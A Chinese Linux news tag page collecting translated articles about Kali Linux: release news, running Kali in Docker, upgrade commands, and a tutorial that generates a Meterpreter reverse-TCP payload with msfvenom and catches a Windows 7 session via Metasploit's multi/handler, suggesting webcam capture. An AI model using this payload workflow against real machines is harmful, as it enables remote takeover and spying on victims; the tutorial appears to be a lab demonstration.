标签 Kali 下的文章

Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行 安全利用代码 security exploit 的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于教育目的哦——一切因此带来的后果和本文作者、译者无关。

源机器详情

Kali Linux

root@kali:/# uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
root@kali:/#

用做攻击对象的目标机器:

Windows 7 Ultimate SP1

步骤 1:创建 Payload 程序

Payload 是一个类似于病毒或者木马的程序,可以运行在远程目标上 —— 为了黑掉那台机器。可以通过以下命令来创建 Payload(program.exe),以便能使用 Kali Linux 黑掉 Windows。

root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root@kali:/# ls -la /root/program.exe
-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

通过 ls 命令,我们可以确认 Payload 程序是否成功生成在指定的位置。

步骤 2:运行 mfsconsole 命令启动 msf 命令窗口

root@kali:# msfconsole


                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

步骤 3:进行漏洞利用的细节

  • 4444 端口:你可以按照自己的想法来选择使用哪个端口
  • LHOST IP:表示 Kali Linux 机器的 IP,这里是 192.168.189.128。 使用如下命令来查看你的 Kali Linux 机器的 IP。
root@kali:/# ip r l
192.168.189.0/24 dev eth0  proto kernel  scope link  src 192.168.189.128  metric 100
root@kali:/#

现在在 msf 命令窗口使用 use exploit/multi/handler 命令,如下:

msf > use exploit/multi/handler
msf exploit(handler) >

然后在接下来的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

现在使用 LHOST 和 LPORT 来设置本地 IP 和本地端口,如下:

msf exploit(handler) > set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit(handler) > set lport 4444
lport => 4444

最后使用 exploit 命令。

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...

现在你需要在 Windows 上运行 program.exe,一旦它在目标机器上执行,你就可以建立一个 meterpreter 会话。输入 sysinfo 就可以得到这台被黑掉的 Windows 机器的详情。

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000

meterpreter > sysinfo
Computer        : MANN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_IN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32

一旦你得到了这些详细信息,就可以做更多的漏洞利用,或者通过 help 命令获取更多信息,以便列出你可以黑掉该系统的所有选项,比如 webcam_snap 命令获取网络摄像头,同样你还可以使用其他更多的可用选项。祝你入侵愉快!!!! ←\_←


作者简介:

嗨,我是 Manmohan Mirkar。很高兴认识你。我接触 Linux 是在十年前,我做梦也没想到我有现在这样的收获。我的愿望就是让你学到 Linux 的知识,谢谢你的阅读。

译者简介:

GHLandy —— 划不完粉腮柳眉泣别离。


via: http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/

作者:Manmohan Mirkar 译者:GHLandy 校对:wxy

本文由 LCTT 原创编译,Linux中国 荣誉推出

今日关注

Kali Linux 2016.2

BackTrack 的继任者 Kali Linux 如他们今年年初承诺的那样,自 DEF CON Vegas 和 Black Hat 大会返回之后就发布了 Kali Linux 新的版本:2016.2。作为知名的安全专家和白帽子专用的发行版,它包含了数量巨大的安全渗透工具和脆弱性评估工具。

Kali Linux 支持多种桌面,如 KDE、Xfce、MATE、LXDE 和 Enlightenment,所有这些桌面都只支持 64 位 CPU。Kali Linux 的上一个版本已经是几个月之前发布的了,由于各种安全工具更新频繁,基本上每天都会有更新,所以建议所有用户都进行更新。不过,Kali Linux 决定从现在开始,以后将每周发布一次更新版本。

除了 Kali Linux ,安全专家们还有另外一个炙手可热的专用发行版:BlackArch,它也发布了更新版本: BlackArch 2016-08-30。BlackArch 和 Kali Linux 不一样,它是基于 Arch Linux 的,而 Kali Linux 是基于 Debian 的。对于喜欢 Arch Linux 的用户来说,BlackArch 显然是一个更好的选择。另外,它支持 32 位和 64 位两种架构。

BlackArch 2016-08-30

图文摘要

GitHub 的“Hackable”的文本编辑器 Atom 发布了 1.10。升级了 Atom Package Manager (APM) ,它运行在 Node 4.4.5 和 npm 3.10.5 上。

之前我们报道过,公开暴露在互联网上的 Redis 存在安全问题,会被利用来获取 SSH 访问权限。而现在,攻击者利用此漏洞对服务器进行勒索,要求被攻击者支付比特币以取回被破坏的文件。

TheSSS (The Smallest Server Suite)是一个由 4MLinux 项目创始人 Zbigniew Konojacki 发布的面向各种规模的服务器的操作系统。它可以用于通过网络快速而简单的分发文件和测试一些基于 Web 的软件。当前发布的 19.0 版本基于相同版本的 4MLinux Server 19.0。

头条消息

想尝试一下渗透测试和安全验证的Linux操作系统的用户,现在可以在你的浏览器中运行 Kali Linux 脆弱性测试系统了。Kali Linux 是 BackTrack 的继任者。网络安全专家创建了一个名为 KaliBrowser 的项目,它可以让你在浏览器中运行 Kali Linux,使用了 Kali Linux Docker 镜像、Openbox 窗口管理器和 NoVNC HTML5-based VNC 客户端等等技术。

目前 Kali Linux 的最新版本是 2016.1,官方还没有发布 Kali Linux 最新的 Docker 镜像。由于这是基于 Docker 镜像实现的,所以你首先得有个就绪的 Docker 环境,然后,用户可以在终端中运行下面命令进行安装:sudo docker run -d -t -i -p 6080:6080 jgamblin/kalibrowser。命令执行完成之后,只需要访问链接 http://localhost:6080 即可。

Canonical 的 Martin Pitt 宣布了一个重大消息,正在紧锣密鼓进行开发的 Ubuntu 16.10 中将使用新的本地 DNS 解析服务。由于 Ubuntu 16.10 将使用最新发布的 systemd 230,因此将基于 systemd 提供本地解析服务的 systemd-resolved 提供新的本地解析服务。这不仅更轻巧,而且可以利用 systemd-resolved 提供的各种新的网络特性,比如 systemd 230 中新提供的默认的 DNSSEC 。之前旧的本地 DNS 解析服务存在一些缺陷,比如当第一个 DNS 服务器无响应时,会延迟应答 1-10秒钟,从而使网络操作变得极慢。

版本更迭

  • Enlightenment 0.21.0 桌面环境即将到来,它刚刚发布了最后一个 RC 版本。这一版本将会提供对 Wayland 更好的支持。Enlightenment 是一款 GNU/Linux 操作系统下自由、开源、轻量而优雅的窗口管理器和桌面环境。感兴趣的可以从官网下载
  • 虽然 Debian GNU/Linux 7 操作系统已经于今年4月进入了 LTS 支持期了,但是最近还是新增了两个 ARM 架构 Armel (ARM EABI) 和 ARMhf (ARM hard-float) 指令集体系结构的支持。官方对该系统的 LTS 支持截止到2018年5月31号。
  • 继 Linux kernel 4.6.1, Linux kernel 4.5.6, 和 Linux kernel 4.4.12 LTS 更新之后,Linux kernel 3.14.71 LTS也进行了更新。这一版本修复了通过 NTLMSSP 协议进行CIFS匿名验证的漏洞,提供了对 Cinterion PH8 和 AHxx 无线以太网适配器的支持。
  • Canonical 发布了一篇安全通告,对所有支持 ImageMagick 的 Ubuntu 操作系统进行了一项重要的安全更新。对一个月前 Nikolay Ermishkin 和 Stewie 发现的非常有名的 ImageTragick 攻击进行了缺陷修复。受影响的操作系统有 Ubuntu 16.04 LTS (Xenial Xerus), Ubuntu 15.10 (Wily Werewolf), Ubuntu 14.04 LTS (Trusty Tahr), 和 Ubuntu 12.04 LTS (Precise Pangolin),这些操作系统的用户应该立即进行更新。
  • Canonical 发布了用于支持 Snap 软件包的守护进程 snapd 2.0.5。Canonical 在极力推进其 Snap 软件包技术的发展,对 OpenGL 、PulseAudio 等部分进行了多处改进,看起来会有更多的游戏打包成 Snap 格式了。

著名的黑客专用 Linux 发行版 Kali Linux 公开发布了其第一个滚动更新版 2016.1。Kali Linux 在 2.0 版本时改为了滚动更新模式,不过仅有部分尝鲜的人可以从 2.0 升级为滚动更新版。经过五个月的测试后,Kali Linux 给黑客们送上了这份最好的礼物 —— 继承了 Debian 的稳定性,集成了各种渗透测试工具,滚动更新的 Kali-Rolling (2016.1)。

Kali 滚动更新版与标准版本的比较

Kali 滚动更新版是基于 Kali 标准版的,而不是基于标准的 Debian 发行版(比如说 Debian 7、8、9等),也不用经历“新版本、维护、过期”的阶段。Kali 滚动版会不断从 Debian testing 进行更新,确保源源不断的得到软件的新版本。

持续更新的渗透测试工具

在测试滚动更新版的这五个月里,渗透测试工具的更新自动提示系统工作得很好,总是可以及时得到这些关注的工具的及时更新。一般来说,从得到这些新工具的更新提示,然后经过打包、测试和发布到仓库的过程,要经过24-48小时的时间差。我们的新的 Kali Linux Package Tracker 可以让你通过邮件和更全面的 Web 界面了解到 Kali Linux 的变化过程。这个跟踪器可以让你了解到各个工具和软件包的什么版本是什么时候进入到仓库中的。举个例子,下面的截屏显示了 nmap 软件包在 Kali 中的版本变化:

pkg-kali

VMware Tools 与 Open-VM-Tools 的对比

这个版本也有一个 VMware 客户端工具方面的戏剧性变化。在 2015年9月, VMware 推荐 使用发行版特定的 open-vm-tools,而不是使用原来的针对客户机的 VMware Tools 软件包。最新的 Kali Linux 滚动更新版包含了一个可以完美工作的 open-vm-tools 软件包,实现了所有需要的功能,比如文件复制、剪贴板复制/粘贴和自动屏幕缩放等。要安装你的 Kali Linux 滚动更新版中的 open-vm-tools 软件包,使用如下命令:

apt-get update
apt-get install open-vm-tools-desktop fuse
reboot

从 Kali 2.0 升级到 Kali 滚动更新版

要从已经安装好的 Kali 2.0(sana)升级到 Kali 滚动更新版很简单,以 root 身份,运行如下命令:

cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali kali-rolling main non-free contrib
EOF

apt-get update
apt-get dist-upgrade # 喝杯咖啡,可能需要10分钟
reboot

请注意,Kali 2.0(sana)的仓库不再更新了,并将于2016年4月15日结束产品周期。

下载 Kali Linux 滚动更新版

Kali Linux 2.0 包括两种 ISO 镜像,一个使用 Gnome 的完整的 ISO 镜像,以及一个“轻量级” ISO 镜像——只包括 top 10 的元包和 XFCE。

下载地址: https://www.kali.org/downloads/

镜像名类型Torrent大小版本SHA1Sum
Kali Linux 64 bitISOTorrent2.6G2016.1deaa41c5c8f26b7854cafb34b6f1b567871c4875
Kali Linux 32 bitISOTorrent2.6G2016.123dadf9c6d3fcd190e345ee070aa57155e93b745
Kali Linux 64 bit LightISOTorrent0.8G2016.14132238042deba9e3bc1702afbdb1b4672b64bcb
Kali Linux 32 bit LightISOTorrent0.8G2016.1addd89b750e31030e96c6cbd5a3da4f0f17287a8
Kali Linux 64 bit miniISOTorrent30M2016.10b37df151ba4a78c940d19af8beafd380326f196
Kali Linux 32 bit miniISOTorrent30M2016.1bb5bb9cf94ef626aac420de019669862861c013d
Kali Linux armelImageTorrent0.7G2016.1b40781f0427924256ce8c7d1c3cbbb5cc824b5fa
Kali Linux armhfImageTorrent0.7G2016.1cd750dde538eaed9f8e4efea011a9b9dc1e75143

介绍

Kali Linux 是一个对于安全测试人员和白帽的一个知名操作系统。它带有大量安全相关的程序,这让它很容易用于渗透测试。最近,Kali Linux 2.0 发布了,它被认为是这个操作系统最重要的一次发布。另一方面,Docker 技术由于它的可扩展性和易用性让它变得很流行。Dokcer 让你非常容易地将你的程序带给你的用户。好消息是你可以通过 Docker 运行Kali Linux 了,让我们看看该怎么做 :)

在 Docker 中运行 Kali Linux 2.0

相关提示

如果你还没有在系统中安装docker,你可以运行下面的命令:

对于 Ubuntu/Linux Mint/Debian:

sudo apt-get install docker 

对于 Fedora/RHEL/CentOS:

sudo yum install docker 

对于 Fedora 22:

dnf install docker 

你可以运行下面的命令来启动docker:

sudo docker start 

首先运行下面的命令确保 Docker 服务运行正常:

sudo docker status 

Kali Linux 的开发团队已将 Kali Linux 的 docker 镜像上传了,只需要输入下面的命令来下载镜像。

docker pull kalilinux/kali-linux-docker 

Pull Kali Linux docker

下载完成后,运行下面的命令来找出你下载的 docker 镜像的 ID。

docker images 

Kali Linux Image ID

现在运行下面的命令来从镜像文件启动 kali linux docker 容器(这里需用正确的镜像ID替换)。

docker run -i -t 198cd6df71ab3 /bin/bash 

它会立刻启动容器并且让你登录到该操作系统,你现在可以在 Kaili Linux 中工作了。

Kali Linux Login

你可以在容器外面通过下面的命令来验证容器已经启动/运行中了:

docker ps 

Docker Kali

总结

Docker 是一种最聪明的用来部署和分发包的方式。Kali Linux docker 镜像非常容易上手,也不会消耗很大的硬盘空间,这样也可以很容易地在任何安装了 docker 的操作系统上测试这个很棒的发行版了。


via: http://linuxpitstop.com/run-kali-linux-2-0-in-docker-container/

作者:Aun 译者:geekpi 校对:wxy

本文由 LCTT 原创翻译,Linux中国 荣誉推出